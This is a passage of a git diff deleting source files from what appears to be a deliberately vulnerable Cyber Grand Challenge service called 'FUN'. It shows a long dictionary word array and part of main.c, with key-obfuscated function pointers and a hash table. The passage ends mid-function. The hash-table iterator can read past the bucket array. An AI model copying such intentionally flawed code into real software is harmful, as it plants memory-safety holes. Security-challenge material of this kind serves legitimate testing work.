"ashen", - "brat", - "ably", - "blip", - "absenteeism", - "hog", - "consistent", - "finger", - "add", - "consequence", - "GOP", - "architectural", - "illustrious", - "bassoon", - "crucify", - "celebration", - "booby trap", - "inactive", - "aside from", - "mama", - "hiker", - "dissident", - "entirety", - "battery", - "gaiety", - "mainstream", - "dean's list", - "inattention", - "impunity", - "gold", - "inefficiency", - "costar", - "lurch", - "joyride", - "bell", - "headmaster", - "maintenance man", - "hostile takeover", - "flamingo", - "firewall", - "economize", - "initiate", - "civil", - "eleven", - "camaraderie", - "analyst", - "ASAP", - "fungus", - "diligence", - "amenity", - "food poisoning", - "lowbrow", - "done", - "contravention", - "language", - "imprison", - "gradation", - "beg", - "handful", - "march", - "frontier", - "deride", - "IOU", - "immorally", - "incontinent", - "bracing", - "angst", - "enlightened", - "easterner", - "amelioration", - "hours", - "goose", - "loudness", - "fated", - "impulse", - "fragrant", - "himself", - "geneticist", - "appetizer", - "brightly", - "extra", - "Chief Executive", - "lion", - "cluster", - "abound", - "folklore", - "incontinence", - "mandatory", - "brownish", - "conciseness", - "fifty", - "lip-read", - "enmity", - "farmer", - "housework", - "boarding pass", - "antennae", - "hickory", - "bough", - "loudspeaker", - "evict", - "groundwork", - "heels", - "markup", - "artificial insemination", - "apostolic", - "facial", - "coolly", - "gang", - "commentary", - "landmark", - "eddy", - "contortion", - "manhunt", - "jittery", - "barbecue", - "deny", - "fiscal year", - "deploy", - "emeritus", - "implication", - "dislike", - "insolence", - "Celsius", - "gross", - "greens", - "grounding", - "healthily", - "incite", - "digital", - "bun", - "hilly", - "cartel", - "latest", - "binding", - "ending", - "daylight saving time", - "back seat", - "cartoon", - "caster", - "doting", - "go-getter", - "arguable", - "Groundhog Day", - "cleanser", - "globule", - "flagpole", - "inherit", - "Indian", - "graciously", - "indirect object", - "jiggle", - "financier", - "guffaw", - "disconnect", - "abroad", - "dialogue", - "hey", - "fame", - "brooch", - "Danish pastry", - "discuss", - "bitterness", - "execution", - "freshen", - "emancipation", - "close-up", - "crochet", - "distraught", - "irreplaceable", - "dominoes", - "assertion", - "diet", - "billy goat", - "indigestion", - "associate degree", - "arsenic", - "abdominal", - "chaplain", - "camera", - "hooligan", - "chicken feed", - "entomologist", - "doctor", - "homage", - "dogwood", - "fore", - "exaggerate", - "awareness", - "furnace", - "exhilarate", - "discount", - "kiddie", - "complicate", - "fruit", - "into", - "geriatric", - "footprint", - "hard-boiled", - "hostess", - "billion", - "dispatch", - "appraise", - "fait accompli", - "incongruity", - "charter", - "boor", - "bestow", - "holster", - "instantly", - "casserole", - "berate", - "exquisite", - "engineering", - "bumper", - "allowable", - "diesel", - "curdle", - "forcibly", - "disciplinary", - "intricacy", - "gust", - "homely", - "categorical", - "earphones", - "composition", - "evasive", - "abnormal", - "hairpiece", - "fatuous", - "celebrity", - "jogging", - "heavenly", - "bewitching", - "locker room", - "caring", - "comatose", - "forswear", - "embarrass", - "immense", - "ecclesiastical", - "luminary", - "conjugal", - "launder", - "dye", - "hone", - "content", - "grandparent", - "kindness", - "explicitly", - "grassy", - "honeymoon", - "countrywoman", - "infect", - "chainsaw", - "half-and-half", - "frustration", - "heighten", - "curry powder", - "lame", - "desire", - "Iron Curtain", - "immersion", - "glowering", - "characterization", - "laser printer", - "egghead", - "limelight", - "macro", - "engrossing", - "laceration", - "mantel", - "coyote", - "Arab", - "double standard", - "denunciation", - "instrumental", - "cane", - "ablaze", - "AC", - "juggle", - "hack", - "loose-leaf", - "brewery", - "left field", - "incurably", - "flight", - "ball game", - "dentist", - "crisscross", - "belly", - "ideological", - "amoral", - "dissimilarity", - "despite", - "gamble", - "attuned", - "main", - "clothe", - "functionally", - "appreciation", - "hue", - "advance", - "adversely", - "alarming", - "anyone", - "anything", - "Fahrenheit", - "future", - "happiness", - "disastrously", - "bedtime", - "allocate", - "mail order", - "argumentative", - "disorient", - "acidity", - "luckily", - "commentate", - "gag", - "cash", - "chronic", - "crusty", - "bookkeeper", - "doggone", - "emancipated", - "distillation", - "ghostwriter", - "enormously", - "fuzzy", - "competently", - "cloakroom", - "fatalistic", - "glamorously", - "launch", - "fetters", - "deterrent", - "heritage", - "infuriate", - "comma", - "health", - "interviewer", - "charade", - "male chauvinism", - "intimacy", - "logjam", - "exultation", - "alcove", - "birthmark", - "lay", - "bereaved", - "erudition", - "integer", - "glut", - "falsetto", - "benevolence", - "double chin", - "hatch", - "equitable", - "its", - "forestall", - "approvingly", - "bully", - "griddle", - "brainy", - "incapable", - "enjoy", - "counsel", - "kiln", - "check mark", - "fatally", - "gazelle", - "madly", - "humanly", - "carefulness", - "chill", - "dictator", - "long-winded", - "deteriorate", - "mangy", - "carpentry", - "cyclical", - "decaffeinated", - "glower", - "gigantic", - "impregnate", - "huffy", - "filmmaker", - "careless", - "bakery", - "bond", - "jet black", - "device", - "Martian", - "emerald", - "dime", - "academically", - "ground", - "injured", - "chessboard", - "exude", - "handout", - "hungry", - "cluck", - "dogged", - "magnetic", - "diabetes", - "chance", - "chief", - "conformist", - "approximate", - "inhaler", - "advertisement", - "Christmas Eve", - "citrus fruit", - "effective", - "how", - "adornment", - "decanter", - "irreparable", - "fashionable", - "downy", - "fidelity", - "irk", - "federal", - "disappearance", - "cauliflower", - "incomparable", - "addition", - "heartburn", - "automate", - "hindrance", - "gregarious", - "and", - "academy", - "hamlet", - "here", - "folly", - "allege", - "drinking water", - "insult", - "incidence", - "carcass", - "gopher", - "armistice", - "distress", - "infinitesimal", - "heirloom", - "gently", - "flowery", - "ascending", - "immature", - "houseboat", - "dramatics", - "clover", - "elope", - "eyeglasses", - "congresswoman", - "convalescent", - "industrial arts", - "ahead", - "craggy", - "deformed", - "justly", - "dumpy", - "initial", - "blanch", - "costume", - "insecure", - "imprecise", - "brown", - "malevolence", - "antagonistic", - "agreement", - "duly", - "chapel", - "interweave", - "grower", - "half brother", - "apartment building", - "commendation", - "bleak", - "disagreement", - "clamor", - "forgotten", - "c/o", - "human resources", - "flute", - "livable", - "excited", - "crippled", - "idolatrous", - "corrosive", - "hp:", - "air time", - "impartially", - "barnyard", - "indistinctly", - "Asia", - "huh", - "like-minded", - "incinerator", - "believer", - "gasp", - "dance", - "absorption", - "barge", - "covetous", - "Holy Communion", - "loner", - "glum", - "await", - "glycerin", - "Highness", - "civil servant", - "dachshund", - "Australian", - "flattery", - "fornication", - "gas pedal", - "clinical", - "manhood", - "civilize", - "import", - "centennial", - "influenza", - "hash", - "comfortably", - "cockeyed", - "hateful", - "intermittently", - "glimpse", - "cogently", - "basket case", - "charge account", - "civil war", - "magnanimous", - "covert", - "dentures", - "lumber", - "lampshade", - "innovate", - "backtrack", - "liberty", - "circumvention", - "escalate", - "disorganization", - "constraint", - "logical", - "anachronistic", - "lure", - "cob", - "involvement", - "decathlon", - "enviously", - "desktop", - "buzzword", - "innocent", - "gamut", - "cleaners", - "espouse", - "intensify", - "dig", - "gleefully", - "abnormality", - "breakneck", - "elusive", - "hesitancy", - "double bass", - "instep", - "hunchback", - "cinder", - "hair", - "capital punishment", - "grandpa", - "considerately", - "discard", - "barrio", - "congenital", - "consonant", - "cornet", - "joyfully", - "color", - "archaeological", - "homogenized", - "acquaint", - "banner", - "credit rating", - "calculus", - "ecologist", - "conqueror", - "haphazard", - "along", - "enemy", - "freeway", - "calmness", - "lives", - "chemist", - "emptiness", - "hushed", - "inspired", - "historically", - "living", - "hometown", - "litany", - "godfather", - "footlights", - "coincidence", - "infuriating", - "apricot", - "hymnal", - "inept", - "entitled", - "disentangle", - "intersect", - "mantle", - "introduce", - "handicapped", - "ford", - "crane", - "dour", - "intricate", - "leafy", - "markdown", - "healer", - "jackass", - "fellowship", - "feasibility", - "allusion", - "carving", - "amphibian", - "bogeyman", - "foundry", - "hickey", - "betrayal", - "forbidding", - "cashew", - "glorious", - "elimination", - "lengthen", - "good guy", - "appeasement", - "blood type", - "concerto", - "comparison", - "gentleman", - "law", - "deliberation", - "liberal", - "latrine", - "feedbag", - "dishtowel", - "iguana", - "conclusive", - "full moon", - "crematoria", - "faltering", - "flowered", - "blameless", - "deed", - "amnesiac", - "godsend", - "bury", - "eastbound", - "foolproof", - "Canadian", - "glamorous", - "country and western", - "curvy", - "loophole", - "cubicle", - "anxiously", - "excision", - "inpatient", - "hemp", - "awkward", - "cornflakes", - "condom", - "around", - "bamboo", - "charmer", - "gadget", - "defendant", - "hasty", - "editor", - "broad", - "explicable", - "evenhanded", - "children", - "breath", - "bomb disposal", - "gambit", - "exchange rate", - "imperative", - "academic", - "chronically", - "mainland", - "jaws", - "astrologer", - "guiltily", - "cue", - "liquidate", - "disparaging", - "ideal", - "bicker", - "m", - "harmonize", - "jaunt", - "asthmatic", - "determination", - "equal", - "breast", - "extreme", - "luncheon", - "agreeable", - "cafeteria", - "good-looking", - "fiendish", - "irregular", - "bashing", - "crossword puzzle", - "entertain", - "determined", - "bitter", - "chunk", - "clutter", - "crib", - "alignment", - "k", - "jock", - "collar", - "bowlegged", - "environs", - "furtive", - "caged", - "inhuman", - "bare-bones", - "impasse", - "dispassionately", - "autoworker", - "across", - "luster", - "formidable", - "black market", - "deputy", - "abreast", - "clutch", - "double", - "inevitably", - "insert", - "interior", - "green bean", - "fixed", - "grant", - "distill", - "iffy", - "absorbing", - "frivolous", - "barracks", - "hemisphere", - "insensitively", - "hyphenate", - "innocuous", - "comment", - "bye", - "devour", - "cookbook", - "fuss", - "information", - "commission", - "air-conditioned", - "daytime", - "bangs", - "angler", - "interception", - "ask", - "collide", - "acclimate", - "locksmith", - "lever", - "godless", - "explanation", - "gent", - "eager", - "bit", - "curry", - "fashionably", - "drone", - "chowder", - "guidelines", - "Federal Reserve System", - "homogeneity", - "condor", - "cradle", - "dreadful", - "grief", - "doohickey", - "dampness", - "investigation", - "chat", - "drawbridge", - "glass", - "expulsion", - "AstroTurf", - "faithful", - "glorify", - "insured", - "beach", - "caricature", - "entangle", - "intrepid", - "lighting", - "discolor", - "complexity", - "deadlock", - "killer", - "embezzler", - "falsity", - "arbitrate", - "left-hand", - "illogical", - "disrupt", - "counterbalance", - "column", - "argument", - "introverted", - "bout", - "collate", - "federation", - "deliberately", - "jerky", - "electric razor", - "drank", - "bland", - "contort", - "colored", - "abruptness", - "Christ", - "carbon copy", - "companion", - "cutthroat", - "backwards", - "bitch", - "blueberry", - "enlargement", - "bagpipes", - "itch", - "asparagus", - "imitative", - "legislate", - "artifact", - "indefinable", - "ebony", - "judicious", - "autonomy", - "isolation", - "conveniently", - "ditty", - "aback", - "falsification", - "khaki", - "carp", - "gravitation", - "giveaway", - "awkwardness", - "long-distance", - "garage sale", - "beer", - "intern", - "junk food", - "chilling", - "inducement", - "liquidation", - "Catholic", - "implore", - "martial law", - "double-decker", - "feeling", - "disfavor", - "ensure", - "depreciation", - "jelly", - "alma mater", - "humanities", - "infraction", - "glowworm", - "liberal arts", - "because of", - "escapism", - "imaginary", - "earthy", - "copulation", - "crepe paper", - "conspicuous", - "hairdresser", - "Girl Scouts", - "bleach", - "D.C.", - "coagulate", - "blastoff", - "kidnapper", - "antagonistically", - "leverage", - "forum", - "elapse", - "bumblebee", - "comedy", - "epitaph", - "increase", - "harpsichord", - "dude ranch", - "cockroach", - "fixation", - "hyphen", - "campground", - "homicide", - "burger", - "elm", - "excursion", - "Hispanic", - "chitchat", - "blow-dry", - "bigotry", - "bumpy", - "blotch", - "confuse", - "differ", - "letup", - "cartoonist", - "contentment", - "concealment", - "bail", - "diverse", - "coordinator", - "absolutely", - "census", - "ale", - "lead", - "accused", - "harelip", - "hardwood", - "hippo", - "double-cross", - "castigation", - "improbable", - "gnome", - "intimidation", - "kindle", - "maddeningly", - "existence", - "amok", - "blab", - "baleful", - "administration", - "emergency brake", - "distance", - "abject", - "hi", - "keepsake", - "lb.", - "eagle-eyed", - "britches", - "house-sitter", - "freezer", - "enrage", - "epitomize", - "in-flight", - "lurk", - "ceremonial", - "ballot", - "abduct", - "component", - "malnourished", - "bible", - "drapes", - "leathery", - "arduous", - "indemnify", - "housekeeper", - "infielder", - "accomplish", - "homey", - "guardian", - "bearing", - "German", - "downwards", - "acid", - "catfish", - "lightly", - "immovable", - "Atlantic", - "insolent", - "gearshift", - "acerbic", - "coffee", - "displacement", - "bribe", - "freehand", - "cardinal", - "cesarean", - "attendant", - "long-standing", - "load", - "disclaimer", - "accuracy", - "alluring", - "altitude", - "crowded", - "deck", - "chauvinism", - "book", - "bridal", - "combustion", - "gas station", - "ashes", - "heaviness", - "health club", - "forage", - "course", - "elaborately", - "ash", - "leak", - "accented", - "hovel", - "fluctuation", - "gesture", - "farming", - "disappointed", - "foe", - "flow chart", - "charitable", - "ma", - "bobcat", - "harm", - "invoice", - "genetic", - "acre", - "dinner", - "fraternize", - "expiration date", - "intensity", - "knack", - "emigrant", - "commercialize", - "intermarry", - "broadcast", - "byte", - "jumpsuit", - "lemon", - "impeccably", - "deeply", - "ingrained", - "discovery", - "abridge", - "endlessly", - "darkroom", - "lustrous", - "l", - "artificial respiration", - "extract", - "curiosity", - "arrogantly", - "gnarly", - "labor union", - "forborne", - "clinician", - "longingly", - "easterly", - "altar", - "kin", - "diphthong", - "energy", - "flu", - "hermit", - "cesspool", - "difference", - "exhausted", - "machete", - "castoff", - "guidance counselor", - "freewheeling", - "flown", - "ground crew", - "filly", - "follicle", - "fantasize", - "delve", - "July", - "development", - "a", - "availability", - "cappuccino", - "canny", - "lukewarm", - "jolly", - "document", - "embargo", - "ante", - "husk", - "COLA", - "acorn", - "manage", - "encroach", - "beholder", - "adolescent", - "admissible", - "hilltop", - "insufficient", - "decision", - "gullet", - "lopsided", - "acrobatics", - "check-in", - "continental", - "disengage", - "defective", - "catch", - "exchange", - "helter-skelter", - "concern", - "fries", - "election", - "gas chamber", - "litmus test", - "hope", - "delegation", - "horseback riding", - "aqueduct", - "demolition", - "barefoot", - "crack", - "henchman", - "anchorwoman", - "Feb.", - "gulf", - "goat", - "divisive", - "diary", - "blotchy", - "lesbianism", - "episode", - "kilometer", - "employ", - "blouse", - "example", - "divulge", - "flyswatter", - "enforce", - "ice-cold", - "acronym", - "forgetful", - "block", - "burnt", - "HQ", - "glow", - "coffee shop", - "Anglican", - "county", - "league", - "local time", - "caterpillar", - "cantankerous", - "astonishingly", - "against", - "honeysuckle", - "martyrdom", - "cheerful", - "elfin", - "hairsplitting", - "dry-clean", - "irrelevant", - "couch potato", - "general", - "gift", - "coaster", - "disinterest", - "croquet", - "cerebral", - "Britain", - "garden", - "fast", - "interjection", - "continued", - "congestion", - "critique", - "archaic", - "inquiry", - "abstain", - "bombed", - "dimple", - "hood", - "extensive", - "disk jockey", - "aggressively", - "demotion", - "great-grandson", - "john", - "earring", - "hazelnut", - "flamboyant", - "lib", - "enlistment", - "marital status", - "biweekly", - "interchangeably", - "fixture", - "aspiring", - "fogy", - "autocracy", - "bra", - "garbage", - "impending", - "marketability", - "indistinguishable", - "cadence", - "January", - "greenery", - "hunk", - "enliven", - "buoyancy", - "implementation", - "joyously", - "bottom line", - "difficult", - "lifesaver", - "enumerate", - "ft.", - "hot chocolate", - "left wing", - "bide", - "hillbilly", - "accompaniment", - "blue blood", - "hoarse", - "goose bumps", - "evaporate", - "loaves", - "helplessly", - "drug addict", - "clergyman", - "dissertation", - "comeback", - "genera", - "grouchy", - "bristle", - "calculating", - "intercede", - "cuticle", - "generically", - "disaffected", - "invitation", - "excellently", - "devastating", - "conspiracy", - "acknowledgment", - "bearable", - "bathrobe", - "arthritic", - "drier", - "apple cider", - "forearm", - "dis", - "entail", - "hewn", - "fire hydrant", - "haystack", - "bag", - "Lutheran", - "centenary", - "grace", - "daydreamer", - "getup", - "cameo", - "cheek", - "havoc", - "inter", - "carbohydrate", - "announcement", - "latch", - "glassy", - "Jesus", - "Internet", - "immunization", - "doctrine", - "aspirin", - "fulfilled", - "loathsome", - "electric shock", - "dump", - "infiltrate", - "harmonica", - "lamb", - "barn", - "earnest", - "locate", - "genitalia", - "enterprise", - "fickle", - "leaves", - "go", - "amazed", - "caravan", - "ID", - "discount store", - "defecate", - "junction", - "federalism", - "maniac", - "chopsticks", - "booking", - "intonation", - "basis", - "definite article", - "inattentive", - "filter", - "confess", - "captivity", - "childbirth", - "bawl", - "forbore", - "checked", - "grumble", - "maliciously", - "expressively", - "hyperactivity", - "magnificently", - "hidden", - "interloper", - "full house", - "fed", - "good old boy", - "dissect", - "forcible", - "mall", - "cooking", - "daybreak", - "grandson", - "anesthetic", - "illegitimacy", - "documentation", - "abuse", - "hammock", - "exhaustive", - "eyelid", - "handbag", - "directions", - "flabbergasted", - "exhibition", - "bunk bed", - "fissure", - "indistinct", - "forcefully", - "deference", - "jaunty", - "ineptitude", - "anthropologist", - "inhabitant", - "death row", - "forth", - "alternation", - "glacier", - "coals", - "disqualify", - "cuisine", - "approbation", - "marshy", - "facility", - "flock", - "apron", - "counterpart", - "bootlegger", - "building", - "canned", - "kangaroo", - "epigram", - "accompanist", - "husky", - "inward", - "bald", - "highbrow", - "bandit", - "convex", - "bases", - "colonial", - "gingerbread", - "bray", - "fighter", - "cod", - "black", - "last name", - "entomology", - "honor", - "god-awful", - "cheers", - "cuteness", - "a la mode", - "gall", - "foreword", - "boat people", - "apprentice", - "herald", - "arcade", - "lovers", - "house arrest", - "boutique", - "eradicate", - "disease", - "err", - "deplore", - "compute", - "dial", - "life span", - "horseshoes", - "enforceable", - "cockpit", - "immaturity", - "admirable", - "afterthought", - "irrepressible", - "delete", - "club soda", - "grad", - "abstinent", - "keep", - "aviator", - "listen", - "disenfranchise", - "dissent", - "flashlight", - "coincidental", - "hands-off", - "alumnae", - "disagree", - "desirable", - "inadequacy", - "intercom", - "hymn", - "concoct", - "inheritance", - "consolidate", - "countryside", - "art", - "caucus", - "amphitheater", - "frighteningly", - "catapult", - "headache", - "downstream", - "downtime", - "gentile", - "heathen", - "lastly", - "cooperate", - "bloodhound", - "majestically", - "imp", - "appointment", - "lug", - "decimal", - "coexistence", - "dated", - "inn", - "cactus", - "jangle", - "daub", - "extinguish", - "harem", - "contaminate", - "congregate", - "historian", - "elements", - "chick", - "customer", - "discreet", - "individualistic", - "exterminate", - "chord", - "installation", - "air", - "conflict of interest", - "fiction", - "hornet", - "laboriously", - "debrief", - "foam", - "lovingly", - "discipline", - "absurdly", - "Coca-Cola", - "comforting", - "hotbed", - "idiotically", - "convenient", - "conciliation", - "hundredth", - "cancel", - "audiovisual", - "escaped", - "capitulation", - "guesstimate", - "dejection", - "droppings", - "basin", - "flotilla", - "acclimation", - "congress", - "formative", - "colonialism", - "formulation", - "callously", - "form", - "list", - "bluish", - "checkmate", - "embalm", - "envious", - "lyrical", - "allure", - "dusty", - "coordination", - "ambivalence", - "eczema", - "auction", - "mannish", - "bacteria", - "disoriented", - "abortive", - "bargaining chip", - "dirt", - "brush-off", - "margin of error", - "disproportionate", - "apathy", - "aboveboard", - "knocker", - "B.S.", - "climax", - "discussion", - "apologize", - "equivalence", - "illness", - "archaeology", - "hijacking", - "condensation", - "lollipop", - "grandeur", - "lookalike", - "glacial", - "intellect", - "later", - "Atlantic Ocean", - "excuse", - "low", - "horrific", - "doorway", - "homosexual", - "hot flash", - "jacket", - "disparate", - "common-law wife", - "incendiary", - "bugle", - "hairdo", - "haywire", - "liqueur", - "bazaar", - "hypnotize", - "calculate", - "adoration", - "dorsal", - "advantage", - "enormous", - "beveled", - "fleshy", - "bisection", - "convent", - "greeting", - "detonate", - "mailbox", - "eloquently", - "eventual", - "blissful", - "duchess", - "aria", - "group", - "huddle", - "impudence", - "baseball", - "eunuch", - "esthetically", - "good-bye", - "illiteracy", - "inessential", - "lexicon", - "hospitalize", - "jump", - "busily", - "managerial", - "gargle", - "knead", - "chloroform", - "magic", - "finale", - "fragrance", - "feline", - "childish", - "brawn", - "ceaselessly", - "banal", - "lite", - "cul-de-sac", - "greenhorn", - "bring", - "dislocation", - "high-grade", - "galley", - "ballad", - "connotation", - "eternal", - "inquest", - "AWOL", - "heart attack", - "appointed", - "malaise", - "gradually", - "burner", - "blackbird", - "cholesterol", - "advancement", - "institution", - "induce", - "e", - "douse", - "glib", - "inaction", - "copper", - "enduring", - "hothead", - "drum", - "farmyard", - "hay fever", - "engage", - "head count", - "mane", - "lick", - "further", - "deface", - "imagery", - "hot-tempered", - "inauguration", - "cannibalism", - "ambition", - "district", - "manger", - "decorate", - "ethical", - "eavesdropper", - "badger", - "freethinker", - "certifiable", - "collapsible", - "animated", - "electrocution", - "embarrassingly", - "Greek", - "jellyfish", - "equestrian", - "discourse", - "instantaneous", - "depravity", - "bait", - "inexplicable", - "boiling point", - "diagonal", - "glitzy", - "hard-working", - "adrenaline", - "befallen", - "herbivore", - "cold", - "inception", - "major-league", - "crutch", - "indices", - "conduct", - "industrialization", - "doz.", - "carousel", - "expect", - "cutting", - "capitalist", - "bandage", - "hopefully", - "investment", - "geology", - "coop", - "befell", - "forked", - "grease", - "annexation", - "kindergarten", - "boomerang", - "belatedly", - "hypertension", - "encompass", - "caught", - "goddamned", - "conference", - "heading", - "ecstasy", - "listener", - "dairy", - "degradation", - "experienced", - "barometric", - "glass ceiling", - "evenness", - "current", - "jinx", - "celebrated", - "immigrate", - "cut", - "autograph", - "diversion", - "kayak", - "feces", - "icon", - "eel", - "maim", - "bowl", - "fearlessly", - "assumption", - "awful", - "habitable", - "bearded", - "double-talk", - "insoluble", - "celery", - "criticize", - "enlighten", - "autobiographical", - "due process", - "cold-blooded", - "boyhood", - "extort", - "expropriate", - "humorist", - "benign", - "fender-bender", - "extol", - "chamber", - "euphemism", - "investor", - "cultivated", - "infest", - "fl. oz.", - "desolation", - "illustrate", - "life-threatening", - "audit", - "bloodshot", - "cynical", - "activist", - "Fri.", - "cheaply", - "gritty", - "deformity", - "Confederate", - "bimonthly", - "bundle", - "fire engine", - "aerosol", - "chauvinist", - "encyclopedia", - "devil", - "crisis", - "fondly", - "infrared", - "elongated", - "insubordinate", - "doghouse", - "hideously", - "blacken", - "child", - "appreciatively", - "imperfection", - "cross", - "butte", - "contemptible", - "imprisonment", - "from", - "fear", - "hamburger", - "DC", - "deprived", - "gosling", - "companionable", - "immobility", - "lust", - "clapper", - "eh", - "induct", - "limit", - "blabbermouth", - "boulder", - "categorize", - "expensive", - "CIA", - "ballistics", - "chairman", - "buoyantly", - "distracted", - "debut", - "epileptic", - "disuse", - "commotion", - "abusive", - "dispensable", - "lozenge", - "campaign", - "drizzle", - "footbridge", - "confident", - "clothesline", - "lettuce", - "empathize", - "kidney bean", - "cesarean section", - "conjure", - "elitist", - "drape", - "eligible", - "hag", - "bidding", - "funky", - "evangelist", - "hazel", - "birdseed", - "crackle", - "glad", - "lounge", - "experience", - "counterfeiter", - "dopey", - "attache case", - "impediment", - "halo", - "hacksaw", - "extremist", - "foul ball", - "flaccid", - "ammonia", - "hexagon", - "documentary", - "guarantor", - "interpersonal", - "gore", - "defiance", - "balloon", - "herd", - "fatalism", - "dash", - "exporter", - "light-headed", - "dust", - "alkaline", - "base", - "cautiously", - "conscience", - "ferociously", - "hackneyed", - "itemize", - "bran", - "consider", - "candle", - "chimpanzee", - "fruity", - "frustrating", - "flow", - "aggravation", - "hydraulics", - "abstinence", - "folk music", - "gossip", - "great", - "dandy", - "feminist", - "flophouse", - "dubious", - "disapproving", - "fire department", - "gotta", - "did", - "legal-size", - "cassette", - "crowbar", - "don't", - "heard", - "access", - "giddy", - "decent", - "amateur", - "chuckle", - "keg", - "condiment", - "low-key", - "figuratively", - "blubber", - "homeopathy", - "candidly", - "chintz", - "aural", - "given", - "male chauvinist", - "homeward", - "executive", - "locker", - "bookmaker", - "force-feed", - "beater", - "bottleneck", - "exhume", - "hang gliding", - "auditorium", - "framework", - "lynch", - "childlike", - NULL -}; diff --git a/challenges/FUN/src/main.c b/challenges/FUN/src/main.c deleted file mode 100644 index 383ee72a3..000000000 --- a/challenges/FUN/src/main.c +++ /dev/null @@ -1,936 +0,0 @@ -/* - * Copyright (c) 2015 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ -#include "cgc_stdlib.h" -#include "cgc_ctype.h" -#include "cgc_stddef.h" -#include "cgc_stdint.h" - -#include "cgc_text.h" -#include "cgc_words_r.h" - -#define INTPTR_MAX INT32_MAX -#define UINTPTR_MAX UINT32_MAX - -#define CALL(x, ...) ((funptr_t)((uintptr_t)funcs[(x)] - secret_key))(__VA_ARGS__) -#define STATIC_SECRET_KEY 0x12345678 -uintptr_t secret_key; -typedef uintptr_t (*funptr_t) (uintptr_t, ...); -funptr_t funcs[]; -enum { - PROTECT, - CALLOC, - FREE, - STRDUP, - STRCPY, - MEMCPY, - STRNCMP, - STRCMP, - BYTECMP, - TO_LOWER, - SEARCH_WORDS, - SORT_WORDS, - ADD_WORD, - VERIFY_WORD, - ANALYZE_TEXT, - GENERATE_TEXT, - RANDOM_DICT_WORD, - RANDOM_WORD, - RANDINT, - INIT, - STRNCPY, - STRLEN, - IS_ALPHA, - PRINTF, - READ, - READ_ALL, - READ_UINT, - READ_STRING, - WRITE_UINT, - WRITE_ERROR, - WRITE_STRING, - HASH_STRING, - HTBL_INIT, - HTBL_ENLARGE, - HTBL_GET, - HTBL_SET, - HTBL_FREE, - HTBL_FIRST, - HTBL_NEXT, - FUNCS_END -}; - -enum { - CMD_QUIT = 0, - CMD_REPROTECT = 0x35897932, - CMD_ADD_WORD = 0x38462643, - CMD_SORT_WORDS = 0x38327950, - CMD_GENERATE_TEXT = 0x2884, - CMD_TRAINING = 0x1971, - CMD_SEARCH_WORD = 0x69399375, - CMD_SEARCH_PARTIAL = CMD_SEARCH_WORD + 1 - // = 0x10582097 - // = 0x49445923 -}; - -enum { - ERROR_OK = 0, - ERROR_INVAL = 1, - ERROR_NOMEM = 2, - ERROR_NOTFOUND = 3 -}; - -typedef struct htbl_node { - struct htbl_node *next; - struct htbl_node *prev; - char *key; - uintptr_t value; -} htbl_node_t; - -typedef struct { - cgc_size_t i; - htbl_node_t *cur; -} htbl_iter_t; - -typedef struct { - unsigned int count; - unsigned int size; - htbl_node_t **nodes; -} htbl_t; - -static void cgc_my_to_lower(char *s) -{ - cgc_size_t i; - for (i = 0; s[i] != 0; i++) - s[i] |= 0x20; -} - -static void cgc_my_strcpy(char *dst, const char *src) -{ - cgc_size_t length = CALL(STRLEN, src); - CALL(MEMCPY, dst, src, length + 1); -} - -static void cgc_my_memcpy(char *dst, char *src, cgc_size_t length) -{ - cgc_size_t i; - for (i = 0; i != length; i++) - dst[i] = src[i]; -} - -static uintptr_t cgc_my_hash_string(const char *s, uintptr_t tbl_size) -{ - cgc_size_t i; - uintptr_t result = 0xDEADBEEF; - for (i = 0; s[i] != 0; i++) - result = (result * 13) ^ s[i]; - - return result % tbl_size; -} - -static intptr_t cgc_my_htbl_init(htbl_t *tbl, uintptr_t initial_size) -{ - tbl->count = 0; - tbl->size = initial_size; - tbl->nodes = CALL(CALLOC, tbl->size, sizeof(htbl_node_t *)); - - if (tbl->nodes == NULL) - return 0; - - return 1; -} - -static void cgc_my_htbl_enlarge(htbl_t *tbl) -{ - cgc_size_t i, new_size = (tbl->size + 1) * 2; - htbl_node_t **new_tbl; - - new_tbl = CALL(CALLOC, new_size, sizeof(htbl_node_t *)); - if (new_tbl == NULL) - return; - - for (i = 0; i < tbl->size; i++) - { - htbl_node_t *node, *next_node; - for (node = tbl->nodes[i]; node != NULL; node = next_node) - { - uintptr_t hash = CALL(HASH_STRING, node->key, new_size); - next_node = node->next; - - node->next = new_tbl[hash]; - node->prev = NULL; - if (node->next) - node->next->prev = node; - new_tbl[hash] = node; - } - } - - CALL(FREE, tbl->nodes); - tbl->nodes = new_tbl; - tbl->size = new_size; -} - -static void cgc_my_htbl_first(htbl_t *tbl, htbl_iter_t *iter) -{ - cgc_size_t i; - for (i = 0; i < tbl->size; i++) - if (tbl->nodes[i] != NULL) - break; - - iter->i = i; - iter->cur = tbl->nodes[i]; -} - -static void cgc_my_htbl_next(htbl_t *tbl, htbl_iter_t *iter) -{ - if (iter->cur == NULL) - return; - - if (iter->cur->next != NULL) - { - iter->cur = iter->cur->next; - } - else - { - cgc_size_t i; - for (i = iter->i + 1; i < tbl->size; i++) - if (tbl->nodes[i] != NULL) - break; - iter->i = i; - - if (iter->i == tbl->size) - iter->cur = NULL; - else - iter->cur = tbl->nodes[i]; - } -} - -static inline htbl_node_t *find_node(htbl_t *tbl, const char *key) -{ - uintptr_t hash = CALL(HASH_STRING, key, tbl->size); - htbl_node_t *node; - - for (node = tbl->nodes[hash]; node != NULL; node = node->next) - if (CALL(STRCMP, key, node->key) == 0) - break; - - return node; -} - -static uintptr_t cgc_my_htbl_get(htbl_t *tbl, const char * key) -{ - htbl_node_t *node = find_node(tbl, key); - - if (node == NULL) - return NULL; - 